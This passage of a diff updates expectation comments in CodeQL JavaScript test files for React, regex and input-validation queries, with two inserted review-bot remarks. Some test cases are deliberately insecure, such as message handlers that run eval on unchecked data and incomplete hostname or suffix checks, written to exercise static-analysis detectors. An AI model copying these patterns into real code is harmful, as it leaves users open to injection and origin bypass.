} @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
} @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
} }); @@ -105,7 +105,7 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -115,7 +115,7 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..acb79317790e 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js 
@@ -4,11 +4,11 @@ class C1 extends React.Component { this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ Alert + this.state.notWrittenButReadInChain; // $ Alert + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } class C3 extends React.Component { constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ Alert } } 
@@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ Alert return
; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } 
@@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

Hello

; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..d2ff35967673 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ class C1 extends React.Component { constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ Alert this.state.readDirectly; this.state.readInChain.foo; } @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; // $ Alert f(this.state); } } @@ -26,8 +26,8 @@ class C2 extends React.Component { class C3 extends React.Component { constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert } } 
@@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return
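Review bot: The `// $ OK - ignored to avoid FP above` comment in this hunk, and the matching one in the following `@@ -46,15 +46,15 @@` hunk, carry a `$`, which throughout this patch marks an expectation tag; everywhere else — including `undefined.js` in the same directory — the ignored cases are written `// OK - ignored to avoid FP above` without it. If the framework reads `$ OK` as an expected result tagged `OK`, both lines will fail as missing results. Drop the `$` so both read `// OK - ignored to avoid FP above`.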

Hello

; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 59114b90c54a..942331c5453c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js 
@@ -9,5 +9,5 @@ /[\x0a\x0a]/; /[\u000a\n]/; /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js 
@@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { 
@@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..319eedf7e22c 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; +/^(?\s+)\w+\2$/; // $ Alert /^(?\s+)\w+\k$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js 
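Review bot: The second line of `parserTest` still calls `.text(x)`, which is not a RegExp method; the old `// ok` comment was removed but the apparent typo for `.test(x)` stays on the new side. The function name suggests it only exercises the regex parser, so this may be harmless, but either correct it to `/^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.test(x);` or add a comment stating that the call is deliberately inert. `parserTest` ends inside the hunk.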
+++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js 
@@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index 
= x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { 
@@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." 
+ allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..5267128a0f3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js 
